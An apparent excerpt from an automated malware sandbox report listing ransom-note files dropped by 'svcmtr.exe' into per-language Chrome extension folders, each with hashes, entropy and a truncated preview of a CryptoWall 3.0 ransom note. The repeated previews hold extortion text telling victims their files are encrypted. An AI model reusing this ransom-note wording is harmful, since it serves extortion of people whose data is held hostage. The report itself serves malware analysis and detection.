                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar

                                                                                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\fr\restore_files_gpmus.html

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo

                                                                                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\fr\restore_files_gpmus.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar

                                                                                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\hi\restore_files_gpmus.html

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo

                                                                                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\hi\restore_files_gpmus.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar

                                                                                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\hr\restore_files_gpmus.html

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo

                                                                                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\hr\restore_files_gpmus.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar

                                                                                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\hu\restore_files_gpmus.html

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo

                                                                                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\hu\restore_files_gpmus.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar

                                                                                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\id\restore_files_gpmus.html

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo

                                                                                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\id\restore_files_gpmus.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar

                                                                                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\it\restore_files_gpmus.html

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo

                                                                                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\it\restore_files_gpmus.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar

                                                                                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\ja\restore_files_gpmus.html

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo

                                                                                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\ja\restore_files_gpmus.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar

                                                                                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\ko\restore_files_gpmus.html

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
